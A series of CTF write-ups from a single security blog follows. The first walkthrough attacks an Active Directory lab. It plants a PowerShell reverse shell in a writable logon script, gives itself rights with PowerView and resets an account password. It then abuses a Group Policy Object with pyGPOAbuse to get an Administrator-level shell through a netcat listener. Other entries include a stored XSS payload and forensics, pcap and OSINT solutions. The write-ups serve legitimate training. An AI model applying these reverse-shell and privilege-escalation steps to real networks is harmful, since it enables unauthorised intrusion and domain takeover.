        If UCase(mappedDrives.Item(i)) = UCase(driveLetter & ":") Then
            isMapped = True
            Exit For
        End If
    Next

    If isMapped Then
        objNetwork.RemoveNetworkDrive driveLetter & ":", True, True
    End If

    objNetwork.MapNetworkDrive driveLetter & ":", sharePath

    If Err.Number = 0 Then
        WScript.Echo "Mapped " & driveLetter & ": to " & sharePath
    Else
        WScript.Echo "Failed to map " & driveLetter & ": " & Err.Description
    End If

    Set objNetwork = Nothing
End Sub

MapNetworkShare "\\dc.baby2.vl\apps", "V"
MapNetworkShare "\\dc.baby2.vl\docs", "L"

This script is a logon script for users and it maps network shares. This means that it will be executed every time a user logs in. Since we have write access to this two share, we can embed a malicious reverse shell inside this file so that when a user logs in, it will be executed and give us a shell

USER FLAG / LOCAL SHELL

So first let’s head to revshells.com and go to PowerShell base64 payloads

NOTE: Keep In Mind To Change LOCAL MACHINE IP and Port

Now edit the login.vbs file in your local machine and put below commands in it :

Set oShell = CreateObject("WScript.Shell")
oShell.run "your-powershell-payload"

now go to the SMB shell and remove the file then again put it from the same directory where you had saved login.vbs

del login.vbs
put login.vbs

Open a netcat shell on the port on your local Machine and you will get a shell

So we are logged in with amelia.griffiths id

Now Go To C:\ and get User Flag

PRIVILEGE ESCALATION / ROOT FLAG

Now Remember we have Carle.Moore Id and Password So we can run bloodhound with it

bloodhound-python -u Carl.Moore -p Carl.Moore -d baby2.vl -ns 10.129.179.22 -c ALL --zip

Now Let’s Analyze it in bloodhound So open neo4j and run bloodhound

As you can see we own Amelia Griffiths user so shortest path from owned principal is above and we can notice that it is a member of LEGACY@BABY2.VL so we can see it has a WriteDacl to the user GPOADM@BABY2.VL then after owning that user we can do generic all for privilege escalation.

WRITEDACL

Now to do this attack you must have PowerView.ps1 module so first git clone or download it from https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon to your local machine.

Now start a local python server in that directory where you had downloaded the PowerView.ps1 module

python3 -m http.server 8000

and in PS C:\Temp> download this module from the local machine to the shell

Invoke-WebRequest -Uri 'http://LOCAL-SERVER-IP:8000/PowerView.ps1' -OutFile 'C:\Temp\PowerView.ps1'
. C:\Temp\PowerView.ps1

Now after running PowerView.ps1 module do this to change GPOADMIN Account password

add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

$cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

set-domainuserpassword gpoadm -accountpassword $cred

Here We go our WriteDacl Attack was successful

GENERIC ALL

Now Let’s Get the root shell using Generic All Method which in case is ACL over the Group Policy Objects

For this we will use pyGPOAbuse tool

In Your Local Machine terminal use this below command and the PowerShell rev shell is same as before (don’t include PowerShell -e )

BE SURE TO PUT DIFFERENT PORT FROM BEFORE TO AVOID GETTING SAME LOCAL SHELL AGAIN

python3 pygpoabuse.py baby2.vl/gpoadm:'Password123!' -command "powershell -exec bypass -enc base64-rev-powershell"  -dc-ip ATTACK-MACHINE-IP -gpo-id "YOUR-GPO-ID"

You will get you GPO ID from your bloodhound in Node properties section

Example cmd:

Schedule Task is successfully created.

Now go to the local shell you got earlier and enter the command to get the root shell

gpupdate

Now do netcat shell

nc -lvnp 9000

Here We Go !!

We got the root shell now get the root.txt from C:\Users\Administrator\root.txt

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Fake Boost

MOHIT SINGH PAPOLA — Thu, 09 Oct 2025 14:17:50 GMT

OVERVIEW

So we are given some file to download . Let’s download it and check it out

We got a capture.pcapng file . Let’s open it in wireshark to analyze it

We can see a different types of packets Now let’s filer out them with http

So Let’s Follow the first packet into TCP Stream and see what it has to read

As you can see there is a large string in the packet in which you can see the operation that are performed on it which is

1) Reverse

2) Base64

So Let’s decode the given string according to this format also so head to CyberChef

Here we go we got the plaintext So Let’s Copy it and Paste it where we can read the output clearly (I am using Notepad for this)

On Scrolling these details i came to a part where it is written Part 1 and it had a base64 string

Let’s Base64 decode it:

BOOM! We got the First part of our flag Now Let’s Find Another One!

Searching in the earlier text i found an AES base64 encoded key

If this is here that means there will an AES encoded cipher So Let’s find the cipher among the earlier wireshark http packets

Here I found One more packet request suspicious so Let’s follow it in TCP Stream too!

Well, It looks like a AES encoded string so let’s decode it again in AES ONLINE DECODER

First Let’s decode the AES key into plaintext from base64

And we got the plaintext now let’s head to the online AES decoder to decode the AES ciphertext

We got some Output Let’s copy it again and paste it to where we can read it easily

We got some Base64 encoded data in Email Parameter So Let’s decode it in CyberChef

Here We Go We Got Our 2nd Part Of The Flag Also !!

Now Join Them And Enter The Flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Compressor

MOHIT SINGH PAPOLA — Sun, 05 Oct 2025 12:22:13 GMT

OVERVIEW

So we were given an instance so let’s start it and head to our attacker machine to nc into it

Here we can see there is a choosing components functionality in which there is a function to create artifact in the form of zip

Seeing this I think about zip vulnerabilities but then i thought let’s start from GTFO bins

Bravo! We got a way to spawn an interactive shell so let’s use it

Let’s Start with creating an Artifact first by choosing option 1

Artifact is created successfully now choose 3 to compress artifact into zip and enter payload inside it as shown below

Here we go We got the shell and also the directory in which we are so just now go to ctf directory and get the flag.txt

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Endpoint

MOHIT SINGH PAPOLA — Sat, 04 Oct 2025 02:28:16 GMT

OVERVIEW

Let’s inspect the downloaded Capture.pcap file in wireshark

Let’s follow any one request into TCP stream as it looks like some data is present there

We can see a long list of strings like this:

So There are two ways to solve this challenge :
Manually
Scripting

Manual Approach

So First Save any request TCP Stream with Save as button

Now I used Both Notepad And VS Code to remove the unnecessary part using Find & Replace functionality

So Open Notepad and press Ctrl + H to open Replace functionality

Now Select the unnecessary element and replace them all with space like shown below:

So after replacing everything unnecessary and just leaving the strings you will get the final results like this:

Now Copy all of them and go to this website https://www.browserling.com/tools/remove-all-whitespace

And Paste All Your Content In This And Click On Remove Spaces Button

Now, Press copy to clipboard to copy the output and Head to CyberChef

Either Press that magic wand or just add base64 decode recipe

Now Scroll the Output Till You Get this

Copy The Last String from that link which is

SFRCe2NodW5rNV80bmRfdWRmX2Ywcl9icjM0a2Y0NTd9

Now Again Paste It Into CyberChef And Base64 decode it and you will get the flag

SCRIPTING / AUTOMATION

So In scripting you have to automate all this manual work in a single script with python So Below is the script that will do all this work and give you the flag

NOTE : Be Sure To Put The Script And Capture.pcap File In Same Directory

 #!/usr/bin/env python3
# pcap_to_flag.py
import struct, socket, re, base64

PCAP = 'capture.pcap'
OUT_COLLECTED = 'collected_vals.txt'

with open(PCAP, 'rb') as f:
    data = f.read()

# parse pcap global header (little-endian magic 0xa1b2c3d4)
off = 0
if len(data) < 24:
    raise SystemExit("pcap too small")
magic,ver_major,ver_minor,thiszone,sigfigs,snaplen,network = struct.unpack('off:off+24])
off += 24

streams = {}
pkt_count = 0
while off + 16 <= len(data):
    ts_sec,ts_usec,incl_len,orig_len = struct.unpack('off:off+16])
    off += 16
    pkt = data[off: off+incl_len]
    off += incl_len
    pkt_count += 1
    if len(pkt) < 14: continue
    eth_type = struct.unpack('!H', pkt[12:14])[0]
    if eth_type != 0x0800: continue
    ip = pkt[14:]
    if len(ip) < 20: continue
    ihl = ip[0] & 0x0F
    ip_header_len = ihl*4
    proto = ip[9]
    src = socket.inet_ntoa(ip[12:16])
    dst = socket.inet_ntoa(ip[16:20])
    if proto != 6: continue
    tcp = ip[ip_header_len:]
    if len(tcp) < 20: continue
    srcp = struct.unpack('!H', tcp[0:2])[0]
    dstp = struct.unpack('!H', tcp[2:4])[0]
    # skip the TCP header (data offset)
    data_offset = (tcp[12] >> 4) * 4
    payload = tcp[data_offset:]
    if not payload: continue
    # only capture flows where either src or dst port is 3306
    if srcp == 3306 or dstp == 3306:
        key = (src, srcp, dst, dstp)
        streams.setdefault(key, bytearray()).extend(payload)

# Normalize bidirectional flows by pairing tuples
norm = {}
for (s,sp,d,dp),payload in streams.items():
    # canonicalize order
    k = tuple(sorted([(s,sp),(d,dp)]))
    norm.setdefault(k, bytearray()).extend(payload)

# concatenate all normalized streams (or pick the biggest one)
all_payload = b''
for k,p in norm.items():
    all_payload += bytes(p)

text = all_payload.decode('latin1', errors='ignore')

# extract base64 fragments inside VALUES('...') in order
parts = re.findall(r"VALUES\s*\(\s*'([A-Za-z0-9+/=_\-]{8,})'\s*\)", text, flags=re.IGNORECASE)
with open(OUT_COLLECTED,'w') as f:
    for p in parts:
        f.write(p + '\n')

print("Collected", len(parts), "fragments ->", OUT_COLLECTED)

# decode fragments
decoded = []
for p in parts:
    clean = re.sub(r'[^A-Za-z0-9+/=_\-]', '', p).replace('-', '+').replace('_','/')
    clean += '=' * ((4 - len(clean)%4) % 4)
    try:
        decoded.append(base64.b64decode(clean))
    except:
        decoded.append(b'')

big = b''.join(decoded)
txt = big.decode('latin1', errors='ignore')

# find and display curl and token
m = re.search(r'packages/callback/([A-Za-z0-9\-_+=/]{8,300})', txt)
if m:
    tok = m.group(1)
    print("Found token:", tok)
    t = tok.replace('-', '+').replace('_','/')
    t += '=' * ((4 - len(t)%4)%4)
    try:
        print("Decoded token:", base64.b64decode(t).decode('utf-8', errors='ignore'))
    except Exception as e:
        print("Failed to decode token:", e)

# fallback: look for HTB{...}
m2 = re.search(r'HTB\{.*?\}', txt, re.DOTALL)
if m2:
    print("Found HTB flag:", m2.group(0))

which will give you the flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

SpookTastic

MOHIT SINGH PAPOLA — Fri, 03 Oct 2025 16:27:05 GMT

OVERVIEW

So we were given instance and a file to download so let’s do it and checkout the website and the content of the file we downloaded

Since most of the buttons are just not useful we see a newsletter functionality

Its accepting the mail but it is the only thing that is working in this site so let’s check out the contents of the downloaded file:

In bot.html file There is a Stored Cross-Site Scripting (XSS) vulnerability. A user-supplied data is stored and later rendered unescaped into HTML with |safe, enabling persistent script execution for any user/bot that views the page

The template uses {{ email|safe }}, which tells Jinja2 to render the value without escaping HTML. That allows injected HTML/JS to be preserved and executed by any browser that renders the template.

A headless browser (bot) that visits the page and captures alert() output.

So Let’s try the below XSS payload to trigger this alert output through newsletter functionality.

<img src=x onerror="alert(document.body.innerText)">

Now let’s check it by submitting it:

Its got successfully executed

So now again click on ok button and it will result in flag because When this payload was stored as an email entry and the bot later visited the /bot view, the image triggered an onerror event and executed the alert(...). The below alert box shown by the bot contained the challenge flag:

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Juicy Details Room on TryHackMe: Complete Walkthrough and Guide

MOHIT SINGH PAPOLA — Wed, 01 Oct 2025 12:40:58 GMT

LINK - https://tryhackme.com/room/juicydetails

So for this challenge we have given Download Files So let’s download those

Now We are asked to answer the question based on the logs files we got so

Ques 1) What tools did the attacker use? (Order by the occurrence in the log)? Given Hint: Look at access.log. User-Agent headers are helpful

So let’s inspect the access.log file to see the lines of tool attacker used line by line

So as you can see we found all the tools used by occurrences which is nmap,hydra,sqlmap,curl,feroxbuster

Ques 2) What endpoint was vulnerable to a brute-force attack?

So as we saw above in access.log that Hydra is used so let’s see the endpoint in which it was brute forcing

So we can see the endpoint was /rest/user/login

Ques 3) What endpoint was vulnerable to SQL injection?

Now in the 1st Ques we saw that it is using sqlmap tool to inject sql payloads thus performing sql injecting attack so let’s see what endpoint was it

So as we can see it was /rest/products/search

Ques 4) What parameter was used for the SQL injection?

So in the above ques we can actually see the parameter used which is q

Ques 5) What endpoint did the attacker try to use to retrieve files? (Include the /) ?

So now let’s see the access.log to find what endpoint does the attacker use to retrieve the files

As obvious it is /ftp which is used to retrieve the files

Ques 6) What section of the website did the attacker use to scrape user email addresses? Hint: Where can customers usually comment on a shopping website?

So I thought about reviews obviously now search up the term review to see what king of review is there

As we guessed it is product reviews which is the answer of this question

Ques 7) Was their brute-force attack successful? If so, what is the timestamp of the successful login? (Yay/Nay, 11/Apr/2021:09:xx:xx +0000)

To see the brute force got successful or not we have to see the logs of hydra tool that which one result in 200 status code

We found it which was Yay, 11/Apr/2021:09:16:31 +0000

Ques 8) What user information was the attacker able to retrieve from the endpoint vulnerable to SQL injection?

Let’s check the sqlmap results in the access.log file

We found it which was email, password

Ques 9) What files did they try to download from the vulnerable endpoint? (endpoint from the previous task, Ques 5)

Lets check the FTP service logs in vsftpd.log file as its about files

Here we go we found the files name which is coupons_2013. md.bak, www-data.bak (Please don’t copy the name exactly as given in this ques so type it yourself as given in image or just trim the space in the given answer because it was referring to link that’s why i added space after 2013. )

Ques 10) What service and account name were used to retrieve files from the previous question? (service, username)

Again its about files so we will look the vsftpd.log file again to find the username since service would be obviously ftp

Yep we found it , it is anonymous so the answer would be ftp,anonymous

Ques 11) What service and username were used to gain shell access to the server? (service, username)

Now since its about authentication so let’s check auth.log file to find the service and username

Well, we came to know that the service and username was ssh, www-data

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANK YOU FOR READING!!

An Unusual Sighting

MOHIT SINGH PAPOLA — Wed, 01 Oct 2025 06:31:25 GMT

OVERVIEW

Start the Instance and Download the given files . We were given two files sshd and bash_history

Now First Let’s see what is there in the instance

So We were asked a question
Ques 1) What is the IP Address and Port of the SSH Server (IP:PORT) ?

Let’s search it up in sshd file

There we go we can see the IP and port is given in the logs which is 100.107.36.130:2221

Now Second question is asked

Ques 2) What time is the first successful Login ?

Again Let’s see the sshd logs

And we found it which is 2024-02-13 11:29:50

Next Question is

Ques 3) What is the time of the unusual Login ?

Now Do you remember we were given a specific operational time in description of challenge

So let’s search about the time after or before this operational time

Yep we found it which is 2024-02-19 04:00:14

Now next question

Ques 4) What is the Fingerprint of the attacker's public key ?

Now lets search it in the attacker time slot in sshd logs

And Here We go got the finger print which is OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4

Move on to the next question

Ques 5) What is the first command the attacker executed after logging in ?

To see it we will now search up the attacker time slot in bash_history file

And we found the command which is whoami

Now next question

Ques 6) What is the final command the attacker executed before logging out ?

Similarly as above question let’s search the bash history file

And it is ./setup

Now submitting all these answers one by one in the shell will gives you the flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Money Flowz

MOHIT SINGH PAPOLA — Mon, 29 Sep 2025 09:06:26 GMT

OVERVIEW

As you can see we don’t have any files to download nor their is any instance but in description we can see there is a name Frank Vitalik

So Lets Search Up his name and to narrow our search i used a little google dorking.

intext:”Frank Vitalik”

And Here wo got a reddit account with same username so lets check it out.

Here scroll below and you will find a link related to freecoinz so let’s check it out too:

Here we can see there is a wallet address and below that we came to know about Ropsten net! coin

Earlier it could be solved easily by just going to https://ropsten.etherscan.io and then just searching the wallet address would give us the transaction details and we would have found the flag.

But Ropsten Testnet was officially deprecated and shut down in late 2022 so https://ropsten.etherscan.io is not available now

So To Find the transaction history of this address we can take help of Wayback Machine Let’s search the above link there and hope we will find something

As you can see there is no data related to the wallet address we are given since the Etherscan address/tx pages are JavaScript-heavy and Wayback sometimes only archived the raw HTML

So Since this challenge ended up unexpectedly even for Hack The Box so we have no option but to see the transaction hash from the writeups or ask Chatgpt to do it

Transaction Hash: 0xe1320c23f292e52090e423e5cdb7b4b10d3c70a8d1b947dff25ae892609f2ef4

Since we got the hash let’s search this up in the wayback machine with the link

https://ropsten.etherscan.io/tx/hash

Here we go, we got one entry let’s open it

Now we can see the hash that we were given earlier and now click on the show more button

Change the input to UTF-8 to see the flag

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!

Urgent

MOHIT SINGH PAPOLA — Tue, 23 Sep 2025 03:37:23 GMT

OVERVIEW

We have given some files to download So, let’s download them and see what information they have:

So first check the file type :

We came to know that its .eml file , So let’s find some website which can help us opening these type of files:

I stumbled upon this website : https://www.encryptomatic.com/viewer

Now Let’s View The File Contents:

As You can read that it is asking to find its online form attachment which we already did using the above website so let’s download that file named as onlineform.html and view its contents

It shows 404 Not Found so Let’s check its source code:

Looks like URL encoded message so let’s head to CyberChef

And Here We Go We Got The Flag !

WE FINALLY DID IT !!!! CHALLENGE SOLVED !!

For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com

THANKS FOR READING !!!